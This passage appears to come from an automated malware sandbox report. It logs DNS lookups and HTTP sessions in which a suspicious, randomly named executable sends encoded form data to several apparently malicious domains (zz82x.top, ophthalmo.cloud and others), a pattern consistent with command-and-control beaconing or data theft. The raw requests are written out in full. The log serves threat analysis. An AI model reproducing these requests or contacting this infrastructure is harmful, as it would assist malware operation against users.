                                              Dec 5, 2024 18:37:11.086616039 CET53510211.1.1.1192.168.2.6
                                              Dec 5, 2024 18:37:11.086632967 CET53510211.1.1.1192.168.2.6
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 5, 2024 18:35:57.875217915 CET192.168.2.61.1.1.10xfe96Standard query (0)www.healthyloveforall.netA (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:36:14.546921015 CET192.168.2.61.1.1.10xd221Standard query (0)www.bonusgame2024.onlineA (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:36:22.859390974 CET192.168.2.61.1.1.10xd68dStandard query (0)www.zz82x.topA (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:36:39.015430927 CET192.168.2.61.1.1.10x3275Standard query (0)www.ophthalmo.cloudA (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:36:54.239870071 CET192.168.2.61.1.1.10x3a63Standard query (0)www.ngmr.xyzA (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:37:09.937289953 CET192.168.2.61.1.1.10x174cStandard query (0)www.specialgift.asiaA (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:37:10.949261904 CET192.168.2.61.1.1.10x174cStandard query (0)www.specialgift.asiaA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 5, 2024 18:35:58.269004107 CET1.1.1.1192.168.2.60xfe96No error (0)www.healthyloveforall.nethealthyloveforall.netCNAME (Canonical name)IN (0x0001)false
                                              Dec 5, 2024 18:35:58.269004107 CET1.1.1.1192.168.2.60xfe96No error (0)healthyloveforall.net3.33.130.190A (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:35:58.269004107 CET1.1.1.1192.168.2.60xfe96No error (0)healthyloveforall.net15.197.148.33A (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:36:14.779361010 CET1.1.1.1192.168.2.60xd221Name error (3)www.bonusgame2024.onlinenonenoneA (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:36:23.189790010 CET1.1.1.1192.168.2.60xd68dNo error (0)www.zz82x.topzz82x.topCNAME (Canonical name)IN (0x0001)false
                                              Dec 5, 2024 18:36:23.189790010 CET1.1.1.1192.168.2.60xd68dNo error (0)zz82x.top38.47.232.196A (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:36:39.798567057 CET1.1.1.1192.168.2.60x3275No error (0)www.ophthalmo.cloud217.160.0.207A (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:36:54.864787102 CET1.1.1.1192.168.2.60x3a63No error (0)www.ngmr.xyz54.67.87.110A (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:37:11.086616039 CET1.1.1.1192.168.2.60x174cNo error (0)www.specialgift.asiawww.specialgift.asia.s.strikinglydns.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 5, 2024 18:37:11.086616039 CET1.1.1.1192.168.2.60x174cNo error (0)www.specialgift.asia.s.strikinglydns.com18.176.133.53A (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:37:11.086616039 CET1.1.1.1192.168.2.60x174cNo error (0)www.specialgift.asia.s.strikinglydns.com54.95.115.3A (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:37:11.086632967 CET1.1.1.1192.168.2.60x174cNo error (0)www.specialgift.asiawww.specialgift.asia.s.strikinglydns.comCNAME (Canonical name)IN (0x0001)false
                                              Dec 5, 2024 18:37:11.086632967 CET1.1.1.1192.168.2.60x174cNo error (0)www.specialgift.asia.s.strikinglydns.com54.95.115.3A (IP address)IN (0x0001)false
                                              Dec 5, 2024 18:37:11.086632967 CET1.1.1.1192.168.2.60x174cNo error (0)www.specialgift.asia.s.strikinglydns.com18.176.133.53A (IP address)IN (0x0001)false
                                              • www.healthyloveforall.net
                                              • www.zz82x.top
                                              • www.ophthalmo.cloud
                                              • www.ngmr.xyz
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.6498233.33.130.190802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:35:58.405879974 CET527OUTGET /r22w/?tX=7fn4Kf88PV&UL=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqGipW/k2jsn/JKtfcj1kIMoHAw6q9wizkelVyrc4WhkWHt6hmqYs= HTTP/1.1
                                              Host: www.healthyloveforall.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Dec 5, 2024 18:35:59.499165058 CET408INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Thu, 05 Dec 2024 17:35:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 268
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 58 3d 37 66 6e 34 4b 66 38 38 50 56 26 55 4c 3d 45 73 52 58 58 37 76 45 6e 55 4a 41 50 34 35 39 6f 39 45 50 47 68 47 2f 5a 61 31 54 44 71 4b 6f 39 2f 6e 53 59 37 4c 5a 4f 36 6b 79 39 76 6f 2f 35 7a 75 78 37 37 5a 61 6f 71 4a 64 77 35 37 4e 68 72 69 73 66 35 65 31 43 33 54 51 46 4c 4e 4c 69 4e 63 71 47 69 70 57 2f 6b 32 6a 73 6e 2f 4a 4b 74 66 63 6a 31 6b 49 4d 6f 48 41 77 36 71 39 77 69 7a 6b 65 6c 56 79 72 63 34 57 68 6b 57 48 74 36 68 6d 71 59 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tX=7fn4Kf88PV&UL=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqGipW/k2jsn/JKtfcj1kIMoHAw6q9wizkelVyrc4WhkWHt6hmqYs="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.64988138.47.232.196802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:23.322952986 CET768OUTPOST /fk06/ HTTP/1.1
                                              Host: www.zz82x.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Origin: http://www.zz82x.top
                                              Connection: close
                                              Content-Length: 207
                                              Cache-Control: max-age=0
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.zz82x.top/fk06/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Data Raw: 55 4c 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 62 56 69 6d 6e 38 68 42 6a 73 55 55 78 35 4c 44 4a 43 4c 6c 52 6f 38 43 67 42 69 56 79 75 34 51 56 75 63 66 51 74 73 58 7a 62 43 6a 6a 45 33 63 4d 69 78 4a 32 2b 65 38 6f 2b 4e 42 51 30 77 79 52 4a 70 74 33 61 38 73 74 6a 76 4c 69 4b 50 2b 5a 4b 39 62 70 34 6f 38 6b 4e 36 46 4d 6c 78 55 52 2b 42 6d 6f 73 52 50 51 57 58 35 52 73 75 6b 41 73 45 56 70 2f 5a 74 74 31 78 2f 41 48 5a 6d 71 72 69 49 48 51 43 63 65 6a 38 57 5a 4b 68 4f 66 79 59 31 59 74 65 34 67 58 4e 4b 72 58 74 49 70 4f 2b 49 31 30 32 55 61 6f 4c 58 70 35 6b 43 61 71 72 35 6e 2b 64 65 79 77 31 69 41 43 50
                                              Data Ascii: UL=3wyGWJa50eJ6lbVimn8hBjsUUx5LDJCLlRo8CgBiVyu4QVucfQtsXzbCjjE3cMixJ2+e8o+NBQ0wyRJpt3a8stjvLiKP+ZK9bp4o8kN6FMlxUR+BmosRPQWX5RsukAsEVp/Ztt1x/AHZmqriIHQCcej8WZKhOfyY1Yte4gXNKrXtIpO+I102UaoLXp5kCaqr5n+deyw1iACP
                                              Dec 5, 2024 18:36:24.856092930 CET691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 05 Dec 2024 17:36:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.64989038.47.232.196802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:25.974590063 CET792OUTPOST /fk06/ HTTP/1.1
                                              Host: www.zz82x.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Origin: http://www.zz82x.top
                                              Connection: close
                                              Content-Length: 231
                                              Cache-Control: max-age=0
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.zz82x.top/fk06/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Data Raw: 55 4c 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 37 46 69 6e 47 38 68 48 44 73 58 49 68 35 4c 4b 70 43 50 6c 52 55 38 43 69 74 79 56 67 61 34 51 33 47 63 65 56 42 73 57 7a 62 43 74 44 45 32 53 73 69 34 4a 32 7a 2b 38 71 71 4e 42 52 51 77 79 55 6c 70 74 67 47 2f 32 64 6a 74 44 43 4b 4e 7a 35 4b 39 62 70 34 6f 38 6b 59 66 46 4e 42 78 55 42 4f 42 30 4a 73 57 47 77 57 51 78 78 73 75 7a 77 73 41 56 70 2f 42 74 76 42 4c 2f 47 4c 5a 6d 76 58 69 49 55 49 44 46 75 6a 2b 49 5a 4c 2f 59 64 65 51 35 62 6b 6a 77 53 54 64 56 59 61 58 4a 66 50 6b 55 47 30 56 47 4b 49 4a 58 72 68 57 43 36 71 42 37 6e 47 64 4d 6c 38 53 74 30 6e 73 77 49 4a 7a 32 4d 77 74 2f 73 32 36 42 45 70 59 70 46 4d 56 2f 77 3d 3d
                                              Data Ascii: UL=3wyGWJa50eJ6l7FinG8hHDsXIh5LKpCPlRU8CityVga4Q3GceVBsWzbCtDE2Ssi4J2z+8qqNBRQwyUlptgG/2djtDCKNz5K9bp4o8kYfFNBxUBOB0JsWGwWQxxsuzwsAVp/BtvBL/GLZmvXiIUIDFuj+IZL/YdeQ5bkjwSTdVYaXJfPkUG0VGKIJXrhWC6qB7nGdMl8St0nswIJz2Mwt/s26BEpYpFMV/w==
                                              Dec 5, 2024 18:36:27.504143953 CET691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 05 Dec 2024 17:36:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.64989738.47.232.196802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:28.630124092 CET1805OUTPOST /fk06/ HTTP/1.1
                                              Host: www.zz82x.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Origin: http://www.zz82x.top
                                              Connection: close
                                              Content-Length: 1243
                                              Cache-Control: max-age=0
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.zz82x.top/fk06/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Data Raw: 55 4c 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 37 46 69 6e 47 38 68 48 44 73 58 49 68 35 4c 4b 70 43 50 6c 52 55 38 43 69 74 79 56 67 43 34 51 6d 6d 63 66 79 56 73 45 6a 62 43 7a 54 45 7a 53 73 6a 34 4a 32 72 68 38 71 6e 34 42 53 34 77 79 32 74 70 35 46 79 2f 34 74 6a 74 63 53 4b 49 2b 5a 4b 73 62 70 6f 6b 38 6b 49 66 46 4e 42 78 55 44 57 42 78 6f 73 57 41 77 57 58 35 52 73 69 6b 41 73 6f 56 70 6e 2f 74 76 46 62 2b 32 72 5a 6c 4c 4c 69 4c 6e 73 44 61 65 6a 34 63 35 4c 33 59 64 54 4f 35 62 4a 63 77 54 33 7a 56 61 47 58 49 6f 69 37 4e 54 56 4a 61 4d 51 46 58 36 39 30 43 4f 71 6b 79 31 47 78 45 56 30 45 71 33 48 38 2b 50 67 72 36 61 4e 74 36 4d 4f 70 50 42 73 55 73 68 56 45 74 39 2b 75 54 59 39 77 7a 6d 6a 53 69 32 56 6c 49 34 43 73 6f 6c 2b 69 42 70 6d 44 38 49 4c 55 6d 4b 4d 6a 72 67 2b 65 6c 48 30 44 61 46 64 58 53 4a 63 58 31 62 62 67 70 6c 32 75 4e 45 6d 71 77 74 54 75 63 72 2b 64 47 66 59 68 59 70 76 36 53 65 35 67 75 37 66 2f 53 72 6d 66 38 6d 67 6c 30 46 6a 72 37 63 6f 30 7a 62 6a 67 47 44 65 [TRUNCATED]
                                              Data Ascii: UL=3wyGWJa50eJ6l7FinG8hHDsXIh5LKpCPlRU8CityVgC4QmmcfyVsEjbCzTEzSsj4J2rh8qn4BS4wy2tp5Fy/4tjtcSKI+ZKsbpok8kIfFNBxUDWBxosWAwWX5RsikAsoVpn/tvFb+2rZlLLiLnsDaej4c5L3YdTO5bJcwT3zVaGXIoi7NTVJaMQFX690COqky1GxEV0Eq3H8+Pgr6aNt6MOpPBsUshVEt9+uTY9wzmjSi2VlI4Csol+iBpmD8ILUmKMjrg+elH0DaFdXSJcX1bbgpl2uNEmqwtTucr+dGfYhYpv6Se5gu7f/Srmf8mgl0Fjr7co0zbjgGDefHnceK62PQL1DNvpp5LJ9bclaLmunC2RxKSnwry/KjDETCOaYtw8HDh4BAgunx7bJhgzjpxP7pcfkKvvH12F6+v8UUSbuha1NnrS6hltxHwCXjNkSJaDi4sZgh0B4dH6JVHfO9VVFl23vYD0wX1ar3HlanGG/ahOlstElzmOhLow2qrvq2EGgp4rgaGd2PeaPaq8h12BLEH5lVIjI/t58hjUoX2DEwqDXp6bI6FROxWjcvUwAxcxPyhB6TOZLrRaUuIleWQIBZHaw6OC0XXrMvBhW4DfZGIxGU6jvPPabC0SqvEdRUO+d9sK1XLVY9iJD6me6YqiyLX26vpHWVJRygO066vN354J9GestDVaFuvLWh8Mad7E9Zhrep5x8esLAVQmtAbuJ39TgDAKfCDQPYg/10DyvpMrojHyyKuQxXEpOFT2rsAWk/w4YANyo6vA7dU9aSmnANjCACCxYaKV7k6Elm8kYicvseJIKK4ZCO7ayT9Gmt/xkm3xJi50bXmfxCiKBqHA3alpCMYkFE5XvjcYwR1dx0+jbt0aX6TofP8W3KO+ysnQ9XPAqYgCCXWhP3uWaEq5Md8glT+eoX4hxZPyffXyl97G/LRmUXL/NpUw+d0vHEmFrVBPTXZe4w58Lynzs7d7LGXJGUp2ENZbu6mWE3sIbmyg3e [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.64990338.47.232.196802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:31.282665014 CET515OUTGET /fk06/?tX=7fn4Kf88PV&UL=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE3/2dDz+8oerua7w1yE5hDJxyFiuXydNgJB2c0DMp1k0BW4j2sII= HTTP/1.1
                                              Host: www.zz82x.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Dec 5, 2024 18:36:34.005141020 CET691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 05 Dec 2024 17:36:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.649923217.160.0.207802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:39.932117939 CET786OUTPOST /mgg3/ HTTP/1.1
                                              Host: www.ophthalmo.cloud
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Origin: http://www.ophthalmo.cloud
                                              Connection: close
                                              Content-Length: 207
                                              Cache-Control: max-age=0
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.ophthalmo.cloud/mgg3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Data Raw: 55 4c 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 70 4d 50 46 43 68 37 66 31 70 67 4f 4c 33 49 52 73 6b 67 63 35 30 2b 4a 55 68 44 30 75 50 6b 6f 77 32 53 4c 6b 62 35 41 4d 4e 78 52 65 66 6f 4a 56 73 48 79 74 4c 50 31 4d 49 78 73 58 72 66 52 71 78 63 7a 4d 5a 64 6a 7a 32 35 6c 34 2f 4b 46 50 47 6b 71 2f 36 66 4a 32 37 48 77 2f 50 62 58 31 68 6f 46 59 78 68 46 57 67 41 41 69 33 6a 31 69 36 39 39 79 55 56 51 41 56 4e 66 53 6c 61 35 79 53 2f 44 53 4c 38 6b 79 39 72 6d 2f 58 76 4d 63 53 41 37 46 4d 70 74 31 76 68 51 66 35 7a 6a 33 65 6a 63 2b 34 6f 68 52 31 6d 47 61 50 77 2b 31 78 50 56 54 6b 31 54 6d 6a 4d 65 31 48 54 4a
                                              Data Ascii: UL=tGqcJQu3iOnopMPFCh7f1pgOL3IRskgc50+JUhD0uPkow2SLkb5AMNxRefoJVsHytLP1MIxsXrfRqxczMZdjz25l4/KFPGkq/6fJ27Hw/PbX1hoFYxhFWgAAi3j1i699yUVQAVNfSla5yS/DSL8ky9rm/XvMcSA7FMpt1vhQf5zj3ejc+4ohR1mGaPw+1xPVTk1TmjMe1HTJ
                                              Dec 5, 2024 18:36:41.294272900 CET779INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Date: Thu, 05 Dec 2024 17:36:41 GMT
                                              Server: Apache
                                              X-Frame-Options: deny
                                              Content-Encoding: gzip
                                              Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                              Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.649929217.160.0.207802544C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 5, 2024 18:36:42.585923910 CET810OUTPOST /mgg3/ HTTP/1.1
                                              Host: www.ophthalmo.cloud
